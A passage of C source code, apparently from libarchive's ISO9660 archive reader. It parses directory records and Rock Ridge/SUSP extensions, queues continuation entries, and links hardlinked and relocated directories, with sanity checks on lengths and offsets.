if (step < 0)
return ((int)step);
iso9660->current_position =
iso9660->entry_content->offset;
}
if (iso9660->entry_content->offset < iso9660->current_position) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Ignoring out-of-order file (%s) %jd < %jd",
iso9660->pathname.s,
(intmax_t)iso9660->entry_content->offset,
(intmax_t)iso9660->current_position);
*buff = NULL;
*size = 0;
*offset = iso9660->entry_sparse_offset;
return (ARCHIVE_WARN);
}
iso9660->entry_bytes_remaining = iso9660->entry_content->size;
}
if (iso9660->entry_zisofs.pz)
return (zisofs_read_data(a, buff, size, offset));
*buff = __archive_read_ahead(a, 1, &bytes_read);
if (bytes_read == 0)
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Truncated input file");
if (*buff == NULL)
return (ARCHIVE_FATAL);
if (bytes_read > iso9660->entry_bytes_remaining)
bytes_read = (ssize_t)iso9660->entry_bytes_remaining;
*size = bytes_read;
*offset = iso9660->entry_sparse_offset;
iso9660->entry_sparse_offset += bytes_read;
iso9660->entry_bytes_remaining -= bytes_read;
iso9660->entry_bytes_unconsumed = bytes_read;
iso9660->current_position += bytes_read;
return (ARCHIVE_OK);
}
static int
archive_read_format_iso9660_cleanup(struct archive_read *a)
{
struct iso9660 *iso9660;
int r = ARCHIVE_OK;
iso9660 = (struct iso9660 *)(a->format->data);
release_files(iso9660);
free(iso9660->read_ce_req.reqs);
archive_string_free(&iso9660->pathname);
archive_string_free(&iso9660->previous_pathname);
if (iso9660->pending_files.files)
free(iso9660->pending_files.files);
#ifdef HAVE_ZLIB_H
free(iso9660->entry_zisofs.uncompressed_buffer);
free(iso9660->entry_zisofs.block_pointers);
if (iso9660->entry_zisofs.stream_valid) {
if (inflateEnd(&iso9660->entry_zisofs.stream) != Z_OK) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to clean up zlib decompressor");
r = ARCHIVE_FATAL;
}
}
#endif
free(iso9660->utf16be_path);
free(iso9660->utf16be_previous_path);
free(iso9660);
(a->format->data) = NULL;
return (r);
}
/*
* This routine parses a single ISO directory record, makes sense
* of any extensions, and stores the result in memory.
*/
static struct file_info *
parse_file_info(struct archive_read *a, struct file_info *parent,
const unsigned char *isodirrec)
{
struct iso9660 *iso9660;
struct file_info *file, *filep;
size_t name_len;
const unsigned char *rr_start, *rr_end;
const unsigned char *p;
size_t dr_len;
uint64_t fsize, offset;
int32_t location;
int flags;
iso9660 = (struct iso9660 *)(a->format->data);
dr_len = (size_t)isodirrec[DR_length_offset];
name_len = (size_t)isodirrec[DR_name_len_offset];
location = archive_le32dec(isodirrec + DR_extent_offset);
fsize = toi(isodirrec + DR_size_offset, DR_size_size);
/* Sanity check that dr_len needs at least 34. */
if (dr_len < 34) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid length of directory record");
return (NULL);
}
/* Sanity check that name_len doesn't exceed dr_len. */
if (dr_len - 33 < name_len || name_len == 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid length of file identifier");
return (NULL);
}
/* Sanity check that location doesn't exceed volume block.
* Don't check lower limit of location; it's possibility
* the location has negative value when file type is symbolic
* link or file size is zero. As far as I know latest mkisofs
* do that.
*/
if (location > 0 &&
(location + ((fsize + iso9660->logical_block_size -1)
/ iso9660->logical_block_size))
> (uint32_t)iso9660->volume_block) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid location of extent of file");
return (NULL);
}
/* Sanity check that location doesn't have a negative value
* when the file is not empty. it's too large. */
if (fsize != 0 && location < 0) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid location of extent of file");
return (NULL);
}
/* Sanity check that this entry does not create a cycle. */
offset = iso9660->logical_block_size * (uint64_t)location;
for (filep = parent; filep != NULL; filep = filep->parent) {
if (filep->offset == offset) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_FILE_FORMAT,
"Directory structure contains loop");
return (NULL);
}
}
/* Create a new file entry and copy data from the ISO dir record. */
file = (struct file_info *)calloc(1, sizeof(*file));
if (file == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for file entry");
return (NULL);
}
file->parent = parent;
file->offset = offset;
file->size = fsize;
file->mtime = isodate7(isodirrec + DR_date_offset);
file->ctime = file->atime = file->mtime;
file->rede_files.first = NULL;
file->rede_files.last = &(file->rede_files.first);
p = isodirrec + DR_name_offset;
/* Rockridge extensions (if any) follow name. Compute this
* before fidgeting the name_len below. */
rr_start = p + name_len + (name_len & 1 ? 0 : 1);
rr_end = isodirrec + dr_len;
if (iso9660->seenJoliet) {
/* Joliet names are max 64 chars (128 bytes) according to spec,
* but genisoimage/mkisofs allows recording longer Joliet
* names which are 103 UCS2 characters(206 bytes) by their
* option '-joliet-long'.
*/
if (name_len > 206)
name_len = 206;
name_len &= ~1;
/* trim trailing first version and dot from filename.
*
* Remember we were in UTF-16BE land!
* SEPARATOR 1 (.) and SEPARATOR 2 (;) are both
* 16 bits big endian characters on Joliet.
*
* TODO: sanitize filename?
* Joliet allows any UCS-2 char except:
* *, /, :, ;, ? and \.
*/
/* Chop off trailing ';1' from files. */
if (name_len > 4 && p[name_len-4] == 0 && p[name_len-3] == ';'
&& p[name_len-2] == 0 && p[name_len-1] == '1')
name_len -= 4;
#if 0 /* XXX: this somehow manages to strip of single-character file extensions, like '.c'. */
/* Chop off trailing '.' from filenames. */
if (name_len > 2 && p[name_len-2] == 0 && p[name_len-1] == '.')
name_len -= 2;
#endif
if ((file->utf16be_name = malloc(name_len)) == NULL) {
archive_set_error(&a->archive, ENOMEM,
"No memory for file name");
return (NULL);
}
memcpy(file->utf16be_name, p, name_len);
file->utf16be_bytes = name_len;
} else {
/* Chop off trailing ';1' from files. */
if (name_len > 2 && p[name_len - 2] == ';' &&
p[name_len - 1] == '1')
name_len -= 2;
/* Chop off trailing '.' from filenames. */
if (name_len > 1 && p[name_len - 1] == '.')
--name_len;
archive_strncpy(&file->name, (const char *)p, name_len);
}
flags = isodirrec[DR_flags_offset];
if (flags & 0x02)
file->mode = AE_IFDIR | 0700;
else
file->mode = AE_IFREG | 0400;
if (flags & 0x80)
file->multi_extent = 1;
else
file->multi_extent = 0;
/*
* Use a location for the file number, which is treated as an inode
* number to find out hardlink target. If Rockridge extensions is
* being used, the file number will be overwritten by FILE SERIAL
* NUMBER of RRIP "PX" extension.
* Note: Old mkisofs did not record that FILE SERIAL NUMBER
* in ISO images.
* Note2: xorriso set 0 to the location of a symlink file.
*/
if (file->size == 0 && location >= 0) {
/* If file->size is zero, its location points wrong place,
* and so we should not use it for the file number.
* When the location has negative value, it can be used
* for the file number.
*/
file->number = -1;
/* Do not appear before any directory entries. */
file->offset = -1;
} else
file->number = (int64_t)(uint32_t)location;
/* Rockridge extensions overwrite information from above. */
if (iso9660->opt_support_rockridge) {
if (parent == NULL && rr_end - rr_start >= 7) {
p = rr_start;
if (memcmp(p, "SP\x07\x01\xbe\xef", 6) == 0) {
/*
* SP extension stores the suspOffset
* (Number of bytes to skip between
* filename and SUSP records.)
* It is mandatory by the SUSP standard
* (IEEE 1281).
*
* It allows SUSP to coexist with
* non-SUSP uses of the System
* Use Area by placing non-SUSP data
* before SUSP data.
*
* SP extension must be in the root
* directory entry, disable all SUSP
* processing if not found.
*/
iso9660->suspOffset = p[6];
iso9660->seenSUSP = 1;
rr_start += 7;
}
}
if (iso9660->seenSUSP) {
int r;
file->name_continues = 0;
file->symlink_continues = 0;
rr_start += iso9660->suspOffset;
r = parse_rockridge(a, file, rr_start, rr_end);
if (r != ARCHIVE_OK) {
free(file);
return (NULL);
}
/*
* A file size of symbolic link files in ISO images
* made by makefs is not zero and its location is
* the same as those of next regular file. That is
* the same as hard like file and it causes unexpected
* error.
*/
if (file->size > 0 &&
(file->mode & AE_IFMT) == AE_IFLNK) {
file->size = 0;
file->number = -1;
file->offset = -1;
}
} else
/* If there isn't SUSP, disable parsing
* rock ridge extensions. */
iso9660->opt_support_rockridge = 0;
}
file->nlinks = 1;/* Reset nlink. we'll calculate it later. */
/* Tell file's parent how many children that parent has. */
if (parent != NULL && (flags & 0x02))
parent->subdirs++;
if (iso9660->seenRockridge) {
if (parent != NULL && parent->parent == NULL &&
(flags & 0x02) && iso9660->rr_moved == NULL &&
file->name.s &&
(strcmp(file->name.s, "rr_moved") == 0 ||
strcmp(file->name.s, ".rr_moved") == 0)) {
iso9660->rr_moved = file;
file->rr_moved = 1;
file->rr_moved_has_re_only = 1;
file->re = 0;
parent->subdirs--;
} else if (file->re) {
/*
* Sanity check: file's parent is rr_moved.
*/
if (parent == NULL || parent->rr_moved == 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE");
return (NULL);
}
/*
* Sanity check: file does not have "CL" extension.
*/
if (file->cl_offset) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE and CL");
return (NULL);
}
/*
* Sanity check: The file type must be a directory.
*/
if ((flags & 0x02) == 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge RE");
return (NULL);
}
} else if (parent != NULL && parent->rr_moved)
file->rr_moved_has_re_only = 0;
else if (parent != NULL && (flags & 0x02) &&
(parent->re || parent->re_descendant))
file->re_descendant = 1;
if (file->cl_offset) {
struct file_info *r;
if (parent == NULL || parent->parent == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
/*
* Sanity check: The file type must be a regular file.
*/
if ((flags & 0x02) != 0) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
parent->subdirs++;
/* Overwrite an offset and a number of this "CL" entry
* to appear before other dirs. "+1" to those is to
* make sure to appear after "RE" entry which this
* "CL" entry should be connected with. */
file->offset = file->number = file->cl_offset + 1;
/*
* Sanity check: cl_offset does not point at its
* the parents or itself.
*/
for (r = parent; r; r = r->parent) {
if (r->offset == file->cl_offset) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
}
if (file->cl_offset == file->offset ||
parent->rr_moved) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Invalid Rockridge CL");
return (NULL);
}
}
}
#if DEBUG
/* DEBUGGING: Warn about attributes I don't yet fully support. */
if ((flags & ~0x02) != 0) {
fprintf(stderr, "\n ** Unrecognized flag: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (toi(isodirrec + DR_volume_sequence_number_offset, 2) != 1) {
fprintf(stderr, "\n ** Unrecognized sequence number: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_file_unit_size_offset) != 0) {
fprintf(stderr, "\n ** Unexpected file unit size: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_interleave_offset) != 0) {
fprintf(stderr, "\n ** Unexpected interleave: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
} else if (*(isodirrec + DR_ext_attr_length_offset) != 0) {
fprintf(stderr, "\n ** Unexpected extended attribute length: ");
dump_isodirrec(stderr, isodirrec);
fprintf(stderr, "\n");
}
#endif
register_file(iso9660, file);
return (file);
}
static int
parse_rockridge(struct archive_read *a, struct file_info *file,
const unsigned char *p, const unsigned char *end)
{
struct iso9660 *iso9660;
iso9660 = (struct iso9660 *)(a->format->data);
while (p + 4 <= end /* Enough space for another entry. */
&& p[0] >= 'A' && p[0] <= 'Z' /* Sanity-check 1st char of name. */
&& p[1] >= 'A' && p[1] <= 'Z' /* Sanity-check 2nd char of name. */
&& p[2] >= 4 /* Sanity-check length. */
&& p + p[2] <= end) { /* Sanity-check length. */
const unsigned char *data = p + 4;
int data_length = p[2] - 4;
int version = p[3];
switch(p[0]) {
case 'C':
if (p[1] == 'E') {
if (version == 1 && data_length == 24) {
/*
* CE extension comprises:
* 8 byte sector containing extension
* 8 byte offset w/in above sector
* 8 byte length of continuation
*/
int32_t location =
archive_le32dec(data);
file->ce_offset =
archive_le32dec(data+8);
file->ce_size =
archive_le32dec(data+16);
if (register_CE(a, location, file)
!= ARCHIVE_OK)
return (ARCHIVE_FATAL);
}
}
else if (p[1] == 'L') {
if (version == 1 && data_length == 8) {
file->cl_offset = (uint64_t)
iso9660->logical_block_size *
(uint64_t)archive_le32dec(data);
iso9660->seenRockridge = 1;
}
}
break;
case 'N':
if (p[1] == 'M') {
if (version == 1) {
parse_rockridge_NM1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
break;
case 'P':
/*
* PD extension is padding;
* contents are always ignored.
*
* PL extension won't appear;
* contents are always ignored.
*/
if (p[1] == 'N') {
if (version == 1 && data_length == 16) {
file->rdev = toi(data,4);
file->rdev <<= 32;
file->rdev |= toi(data + 8, 4);
iso9660->seenRockridge = 1;
}
}
else if (p[1] == 'X') {
/*
* PX extension comprises:
* 8 bytes for mode,
* 8 bytes for nlinks,
* 8 bytes for uid,
* 8 bytes for gid,
* 8 bytes for inode.
*/
if (version == 1) {
if (data_length >= 8)
file->mode
= toi(data, 4);
if (data_length >= 16)
file->nlinks
= toi(data + 8, 4);
if (data_length >= 24)
file->uid
= toi(data + 16, 4);
if (data_length >= 32)
file->gid
= toi(data + 24, 4);
if (data_length >= 40)
file->number
= toi(data + 32, 4);
iso9660->seenRockridge = 1;
}
}
break;
case 'R':
if (p[1] == 'E' && version == 1) {
file->re = 1;
iso9660->seenRockridge = 1;
}
else if (p[1] == 'R' && version == 1) {
/*
* RR extension comprises:
* one byte flag value
* This extension is obsolete,
* so contents are always ignored.
*/
}
break;
case 'S':
if (p[1] == 'L') {
if (version == 1) {
parse_rockridge_SL1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
else if (p[1] == 'T'
&& data_length == 0 && version == 1) {
/*
* ST extension marks end of this
* block of SUSP entries.
*
* It allows SUSP to coexist with
* non-SUSP uses of the System
* Use Area by placing non-SUSP data
* after SUSP data.
*/
iso9660->seenSUSP = 0;
iso9660->seenRockridge = 0;
return (ARCHIVE_OK);
}
break;
case 'T':
if (p[1] == 'F') {
if (version == 1) {
parse_rockridge_TF1(file,
data, data_length);
iso9660->seenRockridge = 1;
}
}
break;
case 'Z':
if (p[1] == 'F') {
if (version == 1)
parse_rockridge_ZF1(file,
data, data_length);
}
break;
default:
break;
}
p += p[2];
}
return (ARCHIVE_OK);
}
static int
register_CE(struct archive_read *a, int32_t location,
struct file_info *file)
{
struct iso9660 *iso9660;
struct read_ce_queue *heap;
struct read_ce_req *p;
uint64_t offset, parent_offset;
int hole, parent;
iso9660 = (struct iso9660 *)(a->format->data);
offset = ((uint64_t)location) * (uint64_t)iso9660->logical_block_size;
if (((file->mode & AE_IFMT) == AE_IFREG &&
offset >= file->offset) ||
offset < iso9660->current_position ||
(((uint64_t)file->ce_offset) + file->ce_size)
> (uint64_t)iso9660->logical_block_size ||
offset + file->ce_offset + file->ce_size
> iso9660->volume_size) {
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Invalid parameter in SUSP \"CE\" extension");
return (ARCHIVE_FATAL);
}
/* Expand our CE list as necessary. */
heap = &(iso9660->read_ce_req);
if (heap->cnt >= heap->allocated) {
int new_size;
if (heap->allocated < 16)
new_size = 16;
else
new_size = heap->allocated * 2;
/* Overflow might keep us from growing the list. */
if (new_size <= heap->allocated) {
archive_set_error(&a->archive, ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
p = calloc(new_size, sizeof(p[0]));
if (p == NULL) {
archive_set_error(&a->archive, ENOMEM, "Out of memory");
return (ARCHIVE_FATAL);
}
if (heap->reqs != NULL) {
memcpy(p, heap->reqs, heap->cnt * sizeof(*p));
free(heap->reqs);
}
heap->reqs = p;
heap->allocated = new_size;
}
/*
* Start with hole at end, walk it up tree to find insertion point.
*/
hole = heap->cnt++;
while (hole > 0) {
parent = (hole - 1)/2;
parent_offset = heap->reqs[parent].offset;
if (offset >= parent_offset) {
heap->reqs[hole].offset = offset;
heap->reqs[hole].file = file;
return (ARCHIVE_OK);
}
/* Move parent into hole <==> move hole up tree. */
heap->reqs[hole] = heap->reqs[parent];
hole = parent;
}
heap->reqs[0].offset = offset;
heap->reqs[0].file = file;
return (ARCHIVE_OK);
}
static void
next_CE(struct read_ce_queue *heap)
{
uint64_t a_offset, b_offset, c_offset;
int a, b, c;
struct read_ce_req tmp;
if (heap->cnt < 1)
return;
/*
* Move the last item in the heap to the root of the tree
*/
heap->reqs[0] = heap->reqs[--(heap->cnt)];
/*
* Rebalance the heap.
*/
a = 0; /* Starting element and its offset */
a_offset = heap->reqs[a].offset;
for (;;) {
b = a + a + 1; /* First child */
if (b >= heap->cnt)
return;
b_offset = heap->reqs[b].offset;
c = b + 1; /* Use second child if it is smaller. */
if (c < heap->cnt) {
c_offset = heap->reqs[c].offset;
if (c_offset < b_offset) {
b = c;
b_offset = c_offset;
}
}
if (a_offset <= b_offset)
return;
tmp = heap->reqs[a];
heap->reqs[a] = heap->reqs[b];
heap->reqs[b] = tmp;
a = b;
}
}
static int
read_CE(struct archive_read *a, struct iso9660 *iso9660)
{
struct read_ce_queue *heap;
const unsigned char *b, *p, *end;
struct file_info *file;
size_t step;
int r;
/* Read data which RRIP "CE" extension points. */
heap = &(iso9660->read_ce_req);
step = iso9660->logical_block_size;
while (heap->cnt &&
heap->reqs[0].offset == iso9660->current_position) {
b = __archive_read_ahead(a, step, NULL);
if (b == NULL) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_MISC,
"Failed to read full block when scanning "
"ISO9660 directory list");
return (ARCHIVE_FATAL);
}
do {
file = heap->reqs[0].file;
if (file->ce_offset + file->ce_size > step) {
archive_set_error(&a->archive,
ARCHIVE_ERRNO_FILE_FORMAT,
"Malformed CE information");
return (ARCHIVE_FATAL);
}
p = b + file->ce_offset;
end = p + file->ce_size;
next_CE(heap);
r = parse_rockridge(a, file, p, end);
if (r != ARCHIVE_OK)
return (ARCHIVE_FATAL);
} while (heap->cnt &&
heap->reqs[0].offset == iso9660->current_position);
/* NOTE: Do not move this consume's code to fron of
* do-while loop. Registration of nested CE extension
* might cause error because of current position. */
__archive_read_consume(a, step);
iso9660->current_position += step;
}
return (ARCHIVE_OK);
}
static void
parse_rockridge_NM1(struct file_info *file,
const unsigned char *data, int data_length)
{
if (!file->name_continues)
archive_string_empty(&file->name);
file->name_continues = 0;
if (data_length < 1)
return;
/*
* NM version 1 extension comprises:
* 1 byte flag, value is one of:
* = 0: remainder is name
* = 1: remainder is name, next NM entry continues name
* = 2: "."
* = 4: ".."
* = 32: Implementation specific
* All other values are reserved.
*/
switch(data[0]) {
case 0:
if (data_length < 2)
return;
archive_strncat(&file->name,
(const char *)data + 1, data_length - 1);
break;
case 1:
if (data_length < 2)
return;
archive_strncat(&file->name,
(const char *)data + 1, data_length - 1);
file->name_continues = 1;
break;
case 2:
archive_strcat(&file->name, ".");
break;
case 4:
archive_strcat(&file->name, "..");
break;
default:
return;
}
}
static void
parse_rockridge_TF1(struct file_info *file, const unsigned char *data,
int data_length)
{
char flag;
/*
* TF extension comprises:
* one byte flag
* create time (optional)
* modify time (optional)
* access time (optional)
* attribute time (optional)
* Time format and presence of fields
* is controlled by flag bits.
*/
if (data_length < 1)
return;
flag = data[0];
++data;
--data_length;
if (flag & 0x80) {
/* Use 17-byte time format. */
if ((flag & 1) && data_length >= 17) {
/* Create time. */
file->birthtime_is_set = 1;
file->birthtime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 2) && data_length >= 17) {
/* Modify time. */
file->mtime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 4) && data_length >= 17) {
/* Access time. */
file->atime = isodate17(data);
data += 17;
data_length -= 17;
}
if ((flag & 8) && data_length >= 17) {
/* Attribute change time. */
file->ctime = isodate17(data);
}
} else {
/* Use 7-byte time format. */
if ((flag & 1) && data_length >= 7) {
/* Create time. */
file->birthtime_is_set = 1;
file->birthtime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 2) && data_length >= 7) {
/* Modify time. */
file->mtime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 4) && data_length >= 7) {
/* Access time. */
file->atime = isodate7(data);
data += 7;
data_length -= 7;
}
if ((flag & 8) && data_length >= 7) {
/* Attribute change time. */
file->ctime = isodate7(data);
}
}
}
static void
parse_rockridge_SL1(struct file_info *file, const unsigned char *data,
int data_length)
{
const char *separator = "";
if (!file->symlink_continues || file->symlink.length < 1)
archive_string_empty(&file->symlink);
file->symlink_continues = 0;
/*
* Defined flag values:
* 0: This is the last SL record for this symbolic link
* 1: this symbolic link field continues in next SL entry
* All other values are reserved.
*/
if (data_length < 1)
return;
switch(*data) {
case 0:
break;
case 1:
file->symlink_continues = 1;
break;
default:
return;
}
++data; /* Skip flag byte. */
--data_length;
/*
* SL extension body stores "components".
* Basically, this is a complicated way of storing
* a POSIX path. It also interferes with using
* symlinks for storing non-path data. <sigh>
*
* Each component is 2 bytes (flag and length)
* possibly followed by name data.
*/
while (data_length >= 2) {
unsigned char flag = *data++;
unsigned char nlen = *data++;
data_length -= 2;
archive_strcat(&file->symlink, separator);
separator = "/";
switch(flag) {
case 0: /* Usual case, this is text. */
if (data_length < nlen)
return;
archive_strncat(&file->symlink,
(const char *)data, nlen);
break;
case 0x01: /* Text continues in next component. */
if (data_length < nlen)
return;
archive_strncat(&file->symlink,
(const char *)data, nlen);
separator = "";
break;
case 0x02: /* Current dir. */
archive_strcat(&file->symlink, ".");
break;
case 0x04: /* Parent dir. */
archive_strcat(&file->symlink, "..");
break;
case 0x08: /* Root of filesystem. */
archive_strcat(&file->symlink, "/");
separator = "";
break;
case 0x10: /* Undefined (historically "volume root" */
archive_string_empty(&file->symlink);
archive_strcat(&file->symlink, "ROOT");
break;
case 0x20: /* Undefined (historically "hostname") */
archive_strcat(&file->symlink, "hostname");
break;
default:
/* TODO: issue a warning ? */
return;
}
data += nlen;
data_length -= nlen;
}
}
static void
parse_rockridge_ZF1(struct file_info *file, const unsigned char *data,
int data_length)
{
if (data[0] == 0x70 && data[1] == 0x7a && data_length == 12) {
/* paged zlib */
file->pz = 1;
file->pz_log2_bs = data[3];
file->pz_uncompressed_size = archive_le32dec(&data[4]);
}
}
static void
register_file(struct iso9660 *iso9660, struct file_info *file)
{
file->use_next = iso9660->use_files;
iso9660->use_files = file;
}
static void
release_files(struct iso9660 *iso9660)
{
struct content *con, *connext;
struct file_info *file;
file = iso9660->use_files;
while (file != NULL) {
struct file_info *next = file->use_next;
archive_string_free(&file->name);
archive_string_free(&file->symlink);
free(file->utf16be_name);
con = file->contents.first;
while (con != NULL) {
connext = con->next;
free(con);
con = connext;
}
free(file);
file = next;
}
}
static int
next_entry_seek(struct archive_read *a, struct iso9660 *iso9660,
struct file_info **pfile)
{
struct file_info *file;
int r;
r = next_cache_entry(a, iso9660, pfile);
if (r != ARCHIVE_OK)
return (r);
file = *pfile;
/* Don't waste time seeking for zero-length bodies. */
if (file->size == 0)
file->offset = iso9660->current_position;
/* flush any remaining bytes from the last round to ensure
* we're positioned */
if (iso9660->entry_bytes_unconsumed) {
__archive_read_consume(a, iso9660->entry_bytes_unconsumed);
iso9660->entry_bytes_unconsumed = 0;
}
/* Seek forward to the start of the entry. */
if (iso9660->current_position < file->offset) {
int64_t step;
step = file->offset - iso9660->current_position;
step = __archive_read_consume(a, step);
if (step < 0)
return ((int)step);
iso9660->current_position = file->offset;
}
/* We found body of file; handle it now. */
return (ARCHIVE_OK);
}
static int
next_cache_entry(struct archive_read *a, struct iso9660 *iso9660,
struct file_info **pfile)
{
struct file_info *file;
struct {
struct file_info *first;
struct file_info **last;
} empty_files;
int64_t number;
int count;
file = cache_get_entry(iso9660);
if (file != NULL) {
*pfile = file;
return (ARCHIVE_OK);
}
for (;;) {
struct file_info *re, *d;
*pfile = file = next_entry(iso9660);
if (file == NULL) {
/*
* If directory entries all which are descendant of
* rr_moved are stil remaning, expose their.
*/
if (iso9660->re_files.first != NULL &&
iso9660->rr_moved != NULL &&
iso9660->rr_moved->rr_moved_has_re_only)
/* Expose "rr_moved" entry. */
cache_add_entry(iso9660, iso9660->rr_moved);
while ((re = re_get_entry(iso9660)) != NULL) {
/* Expose its descendant dirs. */
while ((d = rede_get_entry(re)) != NULL)
cache_add_entry(iso9660, d);
}
if (iso9660->cache_files.first != NULL)
return (next_cache_entry(a, iso9660, pfile));
return (ARCHIVE_EOF);
}
if (file->cl_offset) {
struct file_info *first_re = NULL;
int nexted_re = 0;
/*
* Find "RE" dir for the current file, which
* has "CL" flag.
*/
while ((re = re_get_entry(iso9660))
!= first_re) {
if (first_re == NULL)
first_re = re;
if (re->offset == file->cl_offset) {
re->parent->subdirs--;
re->parent = file->parent;
re->re = 0;
if (re->parent->re_descendant) {
nexted_re = 1;
re->re_descendant = 1;
if (rede_add_entry(re) < 0)
goto fatal_rr;
/* Move a list of descendants
* to a new ancestor. */
while ((d = rede_get_entry(
re)) != NULL)
if (rede_add_entry(d)
< 0)
goto fatal_rr;
break;
}
/* Replace the current file
* with "RE" dir */
*pfile = file = re;
/* Expose its descendant */
while ((d = rede_get_entry(
file)) != NULL)
cache_add_entry(
iso9660, d);
break;
} else
re_add_entry(iso9660, re);
}
if (nexted_re) {
/*
* Do not expose this at this time
* because we have not gotten its full-path
* name yet.
*/
continue;
}
} else if ((file->mode & AE_IFMT) == AE_IFDIR) {
int r;
/* Read file entries in this dir. */
r = read_children(a, file);
if (r != ARCHIVE_OK)
return (r);
/*
* Handle a special dir of Rockridge extensions,
* "rr_moved".
*/
if (file->rr_moved) {
/*
* If this has only the subdirectories which
* have "RE" flags, do not expose at this time.
*/
if (file->rr_moved_has_re_only)
continue;
/* Otherwise expose "rr_moved" entry. */
} else if (file->re) {
/*
* Do not expose this at this time
* because we have not gotten its full-path
* name yet.
*/
re_add_entry(iso9660, file);
continue;
} else if (file->re_descendant) {
/*
* If the top level "RE" entry of this entry
* is not exposed, we, accordingly, should not
* expose this entry at this time because
* we cannot make its proper full-path name.
*/
if (rede_add_entry(file) == 0)
continue;
/* Otherwise we can expose this entry because
* it seems its top level "RE" has already been
* exposed. */
}
}
break;
}
if ((file->mode & AE_IFMT) != AE_IFREG || file->number == -1)
return (ARCHIVE_OK);
count = 0;
number = file->number;
iso9660->cache_files.first = NULL;
iso9660->cache_files.last = &(iso9660->cache_files.first);
empty_files.first = NULL;
empty_files.last = &empty_files.first;
/* Collect files which has the same file serial number.
* Peek pending_files so that file which number is different
* is not put bak. */
while (iso9660->pending_files.used > 0 &&
(iso9660->pending_files.files[0]->number == -1 ||
iso9660->pending_files.files[0]->number == number)) {
if (file->number == -1) {
/* This file has the same offset
* but it's wrong offset which empty files
* and symlink files have.
* NOTE: This wrong offse was recorded by
* old mkisofs utility. If ISO images is
* created by latest mkisofs, this does not
* happen.
*/
file->next = NULL;
*empty_files.last = file;
empty_files.last = &(file->next);
} else {
count++;
cache_add_entry(iso9660, file);
}
file = next_entry(iso9660);
}
if (count == 0) {
*pfile = file;
return ((file == NULL)?ARCHIVE_EOF:ARCHIVE_OK);
}
if (file->number == -1) {
file->next = NULL;
*empty_files.last = file;
empty_files.last = &(file->next);
} else {
count++;
cache_add_entry(iso9660, file);
}
if (count > 1) {
/* The count is the same as number of hardlink,
* so much so that each nlinks of files in cache_file
* is overwritten by value of the count.
*/
for (file = iso9660->cache_files.first;
file != NULL; file = file->next)
file->nlinks = count;
}
/* If there are empty files, that files are added
* to the tail of the cache_files. */
if (empty_files.first != NULL) {
*iso9660->cache_files.last = empty_files.first;
iso9660->cache_files.last = empty_files.last;
}
*pfile = cache_get_entry(iso9660);
return ((*pfile == NULL)?ARCHIVE_EOF:ARCHIVE_OK);
fatal_rr:
archive_set_error(&a->archive, ARCHIVE_ERRNO_MISC,
"Failed to connect 'CL' pointer to 'RE' rr_moved pointer of "
"Rockridge extensions: current position = %jd, CL offset = %jd",
(intmax_t)iso9660->current_position, (intmax_t)file->cl_offset);
return (ARCHIVE_FATAL);
}
static inline void
re_add_entry(struct iso9660 *iso9660, struct file_info *file)
{
file->re_next = NULL;
*iso9660->re_files.last = file;
iso9660->re_files.last = &(file->re_next);
}
static inline struct file_info *
re_get_entry(struct iso9660 *iso9660)
{
struct file_info *file;
if ((file = iso9660->re_files.first) != NULL) {
iso9660->re_files.first = file->re_next;
if (iso9660->re_files.first == NULL)
iso9660->re_files.last =
&(iso9660->re_files.first);
}
return (file);
}
static inline int
rede_add_entry(struct file_info *file)
{
struct file_info *re;
/*
* Find "RE" entry.
*/
re = file->parent;
while (re != NULL && !re->re)
re = re->parent;
if (re == NULL)
return (-1);
file->re_next = NULL;
*re->rede_files.last = file;
re->rede_files.last = &(file->re_next);
return (0);
}
static inline struct file_info *
rede_get_entry(struct file_info *re)
{
struct file_info *file;
if ((file = re->rede_files.first) != NULL) {
re->rede_files.first = file->re_next;
if (re->rede_files.first == NULL)
re->rede_files.last =
&(re->rede_files.first);
}
return (file);
}
static inline void
cache_add_entry(struct iso9660 *iso9660, struct file_info *file)
{
file->next = NULL;
*iso9660->cache_files.last = file;
iso9660->cache_files.last = &(file->next);
}
static inline struct file_info *
cache_get_entry(struct iso9660 *iso9660)
{
struct file_info *file;
if ((file = iso9660->cache_files.first) != NULL) {
iso9660->cache_files.first = file->next;
if (iso9660->cache_files.first == NULL)
iso9660->cache_files.last =
&(iso9660->cache_files.first);
}
return (file);
}
static int
heap_add_entry(struct archive_read *a, struct heap_queue *heap,
struct file_info *file, uint64_t key)
{
uint64_t file_key, parent_key;
int hole, parent;
